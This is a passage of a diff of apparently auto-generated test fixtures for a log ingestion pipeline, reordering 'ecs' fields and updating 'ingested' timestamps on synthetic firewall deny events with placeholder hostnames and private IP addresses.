"event": { - "ingested": "2021-12-09T13:37:20.234018400Z" + "ingested": "2021-12-14T14:42:59.419344344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 22 14:30:33 usmodte1296.www.corp proto=igmp service=ms-wbt-server status=deny src=10.178.244.31 dst=10.69.20.77 src_port=3857 dst_port=7579 server_app=nonnu pid=776 app_name=riat traff_direct=unknown block_count=5575 logon_user=umdolor@osquir6997.corp msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234023Z" + "ingested": "2021-12-14T14:42:59.419344729Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 5 21:33:08 tatno4987.www5.localhost proto=ggp service=pop3 status=deny src=10.54.231.100 dst=10.203.5.162 src_port=5616 dst_port=7290 server_app=iam pid=6096 app_name=ciati traff_direct=unknown block_count=3162 logon_user=umdolore@eniam7007.api.invalid msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234027200Z" + "ingested": "2021-12-14T14:42:59.419345112Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 tatno6787.internal.localhost proto=icmp service=pop3 status=deny src=10.65.83.160 dst=10.136.252.240 src_port=3592 dst_port=4105 server_app=uradi pid=7307 app_name=essequ traff_direct=outbound block_count=7148 logon_user=ender@snulapar3794.api.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234031600Z" + "ingested": "2021-12-14T14:42:59.419345514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 4 11:38:16 essecill2595.mail.local proto=ggp service=http status=deny src=10.57.40.29 dst=10.210.213.18 src_port=7616 dst_port=3970 server_app=atuse pid=2703 app_name=uis traff_direct=internal block_count=6179 
logon_user=onse@liq5883.localdomain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234035400Z" + "ingested": "2021-12-14T14:42:59.419346400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 ali6446.localhost proto=udp service=smtp status=deny src=10.144.82.69 dst=10.200.156.102 src_port=2896 dst_port=6061 server_app=rporis pid=5166 app_name=par traff_direct=outbound block_count=7041 logon_user=rveli@rsint7026.test msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234040300Z" + "ingested": "2021-12-14T14:42:59.419346801Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2 01:43:25 torev7118.internal.domain proto=ipv6 service=smtp status=deny src=10.109.232.112 dst=10.72.58.135 src_port=5160 dst_port=2382 server_app=fugit pid=7668 app_name=rsitamet traff_direct=internal block_count=1112 logon_user=xea@qua2945.www.local msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234046600Z" + "ingested": "2021-12-14T14:42:59.419347191Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 16 08:45:59 dolore6103.www5.example proto=udp service=http status=deny src=10.38.22.45 dst=10.72.29.73 src_port=1493 dst_port=203 server_app=piscing pid=1044 app_name=entsu traff_direct=unknown block_count=4979 logon_user=onproide@luptat6494.www.example msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234052800Z" + "ingested": "2021-12-14T14:42:59.419347606Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 15:48:33 errorsi6996.www.domain proto=tcp service=smtp status=deny src=10.70.95.74 dst=10.76.72.111 src_port=6119 dst_port=7388 server_app=emaperi pid=7183 app_name=sumquiad 
traff_direct=internal block_count=2362 logon_user=ivelits@moenimi6317.internal.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234059Z" + "ingested": "2021-12-14T14:42:59.419348095Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 13 22:51:07 lumquido5839.api.corp proto=ipv6 service=https status=deny src=10.19.201.13 dst=10.73.69.75 src_port=5006 dst_port=6218 server_app=nsec pid=6907 app_name=estqu traff_direct=unknown block_count=2655 logon_user=tat@tion1761.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234065300Z" + "ingested": "2021-12-14T14:42:59.419348599Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 aperia4409.www5.invalid proto=rdp service=ms-wbt-server status=deny src=10.78.151.178 dst=10.84.105.75 src_port=1846 dst_port=98 server_app=uames pid=499 app_name=msequi traff_direct=external block_count=4085 logon_user=iquaUten@santium4235.api.local msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234071500Z" + "ingested": "2021-12-14T14:42:59.419348997Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 12 12:56:16 tem2496.api.lan proto=rdp service=ms-wbt-server status=deny src=10.135.233.146 dst=10.25.192.202 src_port=4181 dst_port=6462 server_app=ents pid=1531 app_name=Loremip traff_direct=internal block_count=4610 logon_user=emeumfu@CSed2857.www5.example msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234077800Z" + "ingested": "2021-12-14T14:42:59.419349389Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 26 19:58:50 eme6710.mail.invalid proto=rdp service=https status=deny src=10.121.219.204 dst=10.104.134.200 
src_port=3611 dst_port=2508 server_app=reetd pid=6051 app_name=quae traff_direct=outbound block_count=7084 logon_user=uptat@equep5085.mail.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234084Z" + "ingested": "2021-12-14T14:42:59.419349774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 ihilm1669.mail.invalid proto=tcp service=https status=deny src=10.191.105.82 dst=10.225.160.182 src_port=3361 dst_port=4810 server_app=uovolup pid=6994 app_name=llu traff_direct=external block_count=3936 logon_user=eirure@conseq557.mail.lan msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234090200Z" + "ingested": "2021-12-14T14:42:59.419350158Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 umexerci1284.internal.localdomain proto=rdp service=smtp status=deny src=10.141.44.153 dst=10.161.57.8 src_port=3750 dst_port=2716 server_app=oei pid=5200 app_name=snostrud traff_direct=inbound block_count=3333 logon_user=quisnos@ite2026.www.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234096700Z" + "ingested": "2021-12-14T14:42:59.419350542Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 8 17:06:33 adol485.example proto=udp service=https status=deny src=10.153.111.103 dst=10.6.167.7 src_port=4977 dst_port=2022 server_app=taevit pid=3365 app_name=nsecte traff_direct=internal block_count=7424 logon_user=eumfug@lit5929.test msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234102900Z" + "ingested": "2021-12-14T14:42:59.419350932Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 23 00:09:07 evita5008.www.localdomain proto=ggp 
service=pop3 status=deny src=10.248.204.182 dst=10.134.148.219 src_port=1331 dst_port=4430 server_app=tmo pid=1835 app_name=abi traff_direct=inbound block_count=4168 logon_user=uioffi@oru6938.invalid msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234112600Z" + "ingested": "2021-12-14T14:42:59.419351451Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 6 07:11:41 tsedqu2456.www5.invalid proto=ipv6 service=smtp status=deny src=10.178.77.231 dst=10.163.5.243 src_port=5294 dst_port=4129 server_app=xerc pid=2019 app_name=hitecto traff_direct=unknown block_count=1123 logon_user=liquide@etdol5473.local msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234119100Z" + "ingested": "2021-12-14T14:42:59.419351849Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 20 14:14:16 ris3314.mail.invalid proto=ggp service=smtp status=deny src=10.177.194.18 dst=10.221.89.228 src_port=766 dst_port=2447 server_app=uamei pid=2493 app_name=aera traff_direct=outbound block_count=1747 logon_user=aliquam@nimid893.mail.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234125400Z" + "ingested": "2021-12-14T14:42:59.419352229Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 3 21:16:50 reme622.mail.example proto=icmp service=ms-wbt-server status=deny src=10.241.65.49 dst=10.32.239.1 src_port=3027 dst_port=3128 server_app=dictasu pid=3022 app_name=catc traff_direct=unknown block_count=3522 logon_user=idata@rumwritt6003.host msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234131600Z" + "ingested": "2021-12-14T14:42:59.419352621Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 
04:19:24 non3341.mail.invalid proto=ggp service=http status=deny src=10.168.90.81 dst=10.101.57.120 src_port=6866 dst_port=6501 server_app=laboree pid=2328 app_name=intocc traff_direct=internal block_count=5516 logon_user=eporr@xeacomm6855.api.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234137100Z" + "ingested": "2021-12-14T14:42:59.419353007Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 ris727.api.local proto=tcp service=ms-wbt-server status=deny src=10.14.211.43 dst=10.130.14.60 src_port=4456 dst_port=2051 server_app=autfu pid=1156 app_name=tessec traff_direct=external block_count=7200 logon_user=litse@icabo4125.mail.domain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234140900Z" + "ingested": "2021-12-14T14:42:59.419353396Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 18 18:24:33 stquido5705.api.host proto=icmp service=http status=deny src=10.60.129.15 dst=10.248.101.25 src_port=106 dst_port=5740 server_app=Nequepo pid=6003 app_name=pora traff_direct=unknown block_count=6437 logon_user=evolup@ionofdeF5643.www.localhost msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234145700Z" + "ingested": "2021-12-14T14:42:59.419353841Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 etcons7378.api.lan proto=tcp service=https status=deny src=10.72.93.28 dst=10.111.187.12 src_port=3577 dst_port=3994 server_app=aper pid=5651 app_name=tur traff_direct=inbound block_count=3427 logon_user=niamqui@orem6702.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234151300Z" + "ingested": "2021-12-14T14:42:59.419354233Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "April 16 08:29:41 vita2681.www5.local proto=icmp service=ms-wbt-server status=deny src=10.27.14.168 dst=10.66.2.232 src_port=2224 dst_port=5764 server_app=fugiatn pid=3470 app_name=ipsumd traff_direct=outbound block_count=6708 logon_user=uirati@oin6780.mail.domain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234156600Z" + "ingested": "2021-12-14T14:42:59.419354635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 tnulapa7592.www.local proto=ggp service=ms-wbt-server status=deny src=10.75.99.127 dst=10.195.2.130 src_port=1766 dst_port=202 server_app=mporin pid=6932 app_name=nisiuta traff_direct=internal block_count=3828 logon_user=inibusB@eprehen3224.www5.localdomain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234160900Z" + "ingested": "2021-12-14T14:42:59.419355022Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 14 22:34:50 lup2134.www.localhost proto=ipv6 service=pop3 status=deny src=10.201.238.90 dst=10.245.104.182 src_port=3759 dst_port=55 server_app=ccaecat pid=6945 app_name=onsequ traff_direct=outbound block_count=4198 logon_user=ovol@ptasn6599.www.localhost msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234165900Z" + "ingested": "2021-12-14T14:42:59.419355403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 29 05:37:24 tanimid3337.mail.corp proto=ipv6-icmp service=http status=deny src=10.217.150.196 dst=10.105.91.31 src_port=2056 dst_port=5987 server_app=loreme pid=853 app_name=psumquia traff_direct=external block_count=4444 logon_user=con@nisist2752.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234170400Z" + "ingested": "2021-12-14T14:42:59.419355907Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 eumiu765.api.lan proto=ipv6-icmp service=https status=deny src=10.4.157.1 dst=10.184.18.202 src_port=52 dst_port=205 server_app=ofdeFini pid=4153 app_name=molli traff_direct=outbound block_count=725 logon_user=oditem@gitsedqu2649.mail.lan msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234174500Z" + "ingested": "2021-12-14T14:42:59.419356287Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 26 19:42:33 mquelau5326.mail.lan proto=icmp service=https status=deny src=10.255.39.252 dst=10.113.95.59 src_port=863 dst_port=4367 server_app=fugitsed pid=1693 app_name=idolo traff_direct=internal block_count=3147 logon_user=persp@entsunt3962.www.example msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234178900Z" + "ingested": "2021-12-14T14:42:59.419356683Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 11 02:45:07 idestlab2631.www.lan proto=tcp service=http status=deny src=10.27.16.118 dst=10.83.177.2 src_port=18 dst_port=1827 server_app=iat pid=337 app_name=rinre traff_direct=internal block_count=1300 logon_user=borios@tut2703.www.host msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234182700Z" + "ingested": "2021-12-14T14:42:59.419357073Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 25 09:47:41 inesci6789.test proto=udp service=http status=deny src=10.38.54.72 dst=10.167.227.44 src_port=6595 dst_port=5736 server_app=lillum pid=7041 app_name=its traff_direct=outbound block_count=7644 logon_user=riamea@entorev160.test msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234187500Z" + "ingested": "2021-12-14T14:42:59.419357474Z" + 
}, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 8 16:50:15 ccaeca7077.internal.corp proto=tcp service=http status=deny src=10.216.54.184 dst=10.215.205.216 src_port=1495 dst_port=647 server_app=riat pid=3854 app_name=psaquaea traff_direct=external block_count=7536 logon_user=ameiusm@proide3714.mail.localdomain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234193700Z" + "ingested": "2021-12-14T14:42:59.419357864Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 22 23:52:50 ima2031.api.corp proto=igmp service=smtp status=deny src=10.9.12.248 dst=10.9.18.237 src_port=765 dst_port=2486 server_app=tpersp pid=55 app_name=seosqui traff_direct=internal block_count=6379 logon_user=uradi@tot5313.mail.invalid msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234200Z" + "ingested": "2021-12-14T14:42:59.419358249Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 6 06:55:24 ian867.internal.corp proto=rdp service=https status=deny src=10.83.130.226 dst=10.41.123.102 src_port=1542 dst_port=2300 server_app=odoconse pid=228 app_name=quatu traff_direct=external block_count=7661 logon_user=tenim@rumet3801.internal.domain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234206100Z" + "ingested": "2021-12-14T14:42:59.419358636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 20 13:57:58 lorin4249.corp proto=tcp service=pop3 status=deny src=10.175.112.197 dst=10.80.152.108 src_port=1749 dst_port=2742 server_app=exeacom pid=4253 app_name=rita traff_direct=outbound block_count=6984 logon_user=tametcon@liqua2834.www5.lan msg=failure", "event": { - "ingested": 
"2021-12-09T13:37:20.234212300Z" + "ingested": "2021-12-14T14:42:59.419359028Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 gnaaliqu3935.api.test proto=udp service=smtp status=deny src=10.134.18.114 dst=10.142.25.100 src_port=2761 dst_port=5770 server_app=mdol pid=2200 app_name=nby traff_direct=internal block_count=624 logon_user=osqui@sequat7273.api.host msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234218500Z" + "ingested": "2021-12-14T14:42:59.419359466Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 19 04:03:07 nsequat1859.internal.localhost proto=udp service=http status=deny src=10.28.118.160 dst=10.223.119.218 src_port=6247 dst_port=300 server_app=umexerc pid=5717 app_name=intocc traff_direct=internal block_count=4387 logon_user=ntsunt@uidol4575.localhost msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234224600Z" + "ingested": "2021-12-14T14:42:59.419359860Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2 11:05:41 ritin2495.api.corp proto=ggp service=https status=deny src=10.110.114.175 dst=10.47.28.48 src_port=4986 dst_port=3032 server_app=tatem pid=4469 app_name=luptat traff_direct=unknown block_count=4488 logon_user=plicab@oremq2000.api.corp msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234230800Z" + "ingested": "2021-12-14T14:42:59.419360245Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 16 18:08:15 tetur2694.mail.local proto=ggp service=pop3 status=deny src=10.40.251.202 dst=10.90.33.138 src_port=5733 dst_port=7876 server_app=enimadmi pid=5524 app_name=lupta traff_direct=external block_count=6847 
logon_user=nvolupt@oremi1485.api.localhost msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234236900Z" + "ingested": "2021-12-14T14:42:59.419360625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 1 01:10:49 rem7043.localhost proto=ipv6 service=ms-wbt-server status=deny src=10.65.2.106 dst=10.227.173.252 src_port=5410 dst_port=5337 server_app=nisiut pid=3624 app_name=teturad traff_direct=external block_count=7576 logon_user=itation@sequatD5469.www5.lan msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234243100Z" + "ingested": "2021-12-14T14:42:59.419362054Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 emqu2846.internal.home proto=udp service=https status=deny src=10.193.233.229 dst=10.28.84.106 src_port=2859 dst_port=4844 server_app=eaqu pid=1609 app_name=uptatemU traff_direct=inbound block_count=3096 logon_user=tla@item2738.test msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234249300Z" + "ingested": "2021-12-14T14:42:59.419362468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 29 15:15:58 dqu6144.api.localhost proto=ggp service=ms-wbt-server status=deny src=10.150.245.88 dst=10.210.89.183 src_port=3642 dst_port=2589 server_app=ulpa pid=6248 app_name=iusmodte traff_direct=external block_count=2700 logon_user=sequa@iosamnis1047.internal.localdomain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234255400Z" + "ingested": "2021-12-14T14:42:59.419362862Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 12 22:18:32 giatquov1918.internal.example proto=udp service=ms-wbt-server status=deny src=10.180.195.43 dst=10.85.185.13 
src_port=4540 dst_port=7793 server_app=gnaal pid=7224 app_name=proident traff_direct=outbound block_count=1867 logon_user=voluptas@orroq6677.internal.example msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234261900Z" + "ingested": "2021-12-14T14:42:59.419363391Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 estl5804.internal.local proto=udp service=ms-wbt-server status=deny src=10.207.211.230 dst=10.210.28.247 src_port=3449 dst_port=7257 server_app=ssecil pid=430 app_name=iuntNe traff_direct=unknown block_count=7672 logon_user=tate@onevo4326.internal.local msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234268200Z" + "ingested": "2021-12-14T14:42:59.419363779Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 10 12:23:41 Sedut1775.www.domain proto=rdp service=ms-wbt-server status=deny src=10.86.11.48 dst=10.248.165.185 src_port=3436 dst_port=5460 server_app=olorsi pid=3589 app_name=exeaco traff_direct=external block_count=4801 logon_user=dquiac@itaedict7233.mail.localdomain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234273Z" + "ingested": "2021-12-14T14:42:59.419364192Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 24 19:26:15 mac7484.www5.test proto=ipv6-icmp service=http status=deny src=10.118.6.177 dst=10.47.125.38 src_port=6977 dst_port=3896 server_app=isn pid=4814 app_name=omm traff_direct=outbound block_count=1844 logon_user=quunt@numquam5869.internal.example msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234278500Z" + "ingested": "2021-12-14T14:42:59.419364587Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 
02:28:49 oin1140.mail.localhost proto=icmp service=pop3 status=deny src=10.50.233.155 dst=10.60.142.127 src_port=1081 dst_port=5112 server_app=urExce pid=276 app_name=nturm traff_direct=outbound block_count=2241 logon_user=atv@onu6137.api.home msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234284200Z" + "ingested": "2021-12-14T14:42:59.419364985Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 25 09:31:24 naaliq3710.api.local proto=rdp service=http status=deny src=10.28.82.189 dst=10.120.10.211 src_port=3916 dst_port=7661 server_app=odt pid=2452 app_name=inv traff_direct=internal block_count=7705 logon_user=rcit@aecatcup2241.www5.test msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234294800Z" + "ingested": "2021-12-14T14:42:59.419365371Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 8 16:33:58 volupta3552.internal.localhost proto=ipv6 service=pop3 status=deny src=10.31.237.225 dst=10.6.38.163 src_port=6153 dst_port=4059 server_app=oreveri pid=3453 app_name=avolu traff_direct=inbound block_count=2820 logon_user=olup@labor6360.mail.local msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234300200Z" + "ingested": "2021-12-14T14:42:59.419365762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 22 23:36:32 onse380.internal.localdomain proto=ggp service=https status=deny src=10.226.5.189 dst=10.125.165.144 src_port=3371 dst_port=7889 server_app=dexerc pid=2302 app_name=tatem traff_direct=inbound block_count=5407 logon_user=mvolu@mveleum4322.www5.host msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234306900Z" + "ingested": "2021-12-14T14:42:59.419366148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { 
- "version": "1.12.0" - }, "message": "May 7 06:39:06 queips4947.mail.example proto=udp service=smtp status=deny src=10.97.149.97 dst=10.46.56.204 src_port=2463 dst_port=5070 server_app=uela pid=7079 app_name=umf traff_direct=unknown block_count=2441 logon_user=dolorsit@archite1843.mail.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234312Z" + "ingested": "2021-12-14T14:42:59.419366539Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 oloreseo5039.test proto=ggp service=https status=deny src=10.218.0.197 dst=10.28.105.124 src_port=7581 dst_port=4797 server_app=eritin pid=5773 app_name=litsedq traff_direct=outbound block_count=5749 logon_user=ntNe@itanim4024.api.example msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234316200Z" + "ingested": "2021-12-14T14:42:59.419366927Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 minim459.mail.local proto=rdp service=https status=deny src=10.123.199.198 dst=10.17.87.79 src_port=6332 dst_port=3414 server_app=tionula pid=1586 app_name=ate traff_direct=outbound block_count=5006 logon_user=ratvolu@nreprehe715.api.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234320800Z" + "ingested": "2021-12-14T14:42:59.419367309Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 19 03:46:49 eratv211.api.host proto=rdp service=https status=deny src=10.38.86.177 dst=10.115.68.40 src_port=5768 dst_port=5483 server_app=boNem pid=5137 app_name=ssusci traff_direct=internal block_count=2841 logon_user=mpo@unte893.internal.host msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234324700Z" + "ingested": "2021-12-14T14:42:59.419367702Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 aparia1179.www.localdomain proto=tcp service=https status=deny src=10.193.118.163 dst=10.115.174.107 src_port=548 dst_port=5597 server_app=acom pid=5704 app_name=dolorem traff_direct=internal block_count=10 logon_user=exeacomm@aspe951.mail.domain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234329600Z" + "ingested": "2021-12-14T14:42:59.419368087Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 17 17:51:58 iatqu6203.mail.corp proto=icmp service=http status=deny src=10.37.128.49 dst=10.77.77.208 src_port=625 dst_port=1101 server_app=esci pid=2310 app_name=essecill traff_direct=external block_count=2653 logon_user=moles@dipiscin4957.www.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234336Z" + "ingested": "2021-12-14T14:42:59.419368478Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 ptasnula6576.api.invalid proto=tcp service=ms-wbt-server status=deny src=10.54.73.158 dst=10.1.96.93 src_port=5752 dst_port=428 server_app=docon pid=5398 app_name=ntium traff_direct=internal block_count=4392 logon_user=lloinven@econs2687.internal.localdomain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234349700Z" + "ingested": "2021-12-14T14:42:59.419368868Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 mag1506.internal.domain proto=igmp service=smtp status=deny src=10.131.126.109 dst=10.182.152.242 src_port=1877 dst_port=6998 server_app=rcitat pid=2465 app_name=ecillum traff_direct=inbound block_count=3208 logon_user=dolor@tiumto5834.api.lan msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234358600Z" + "ingested": 
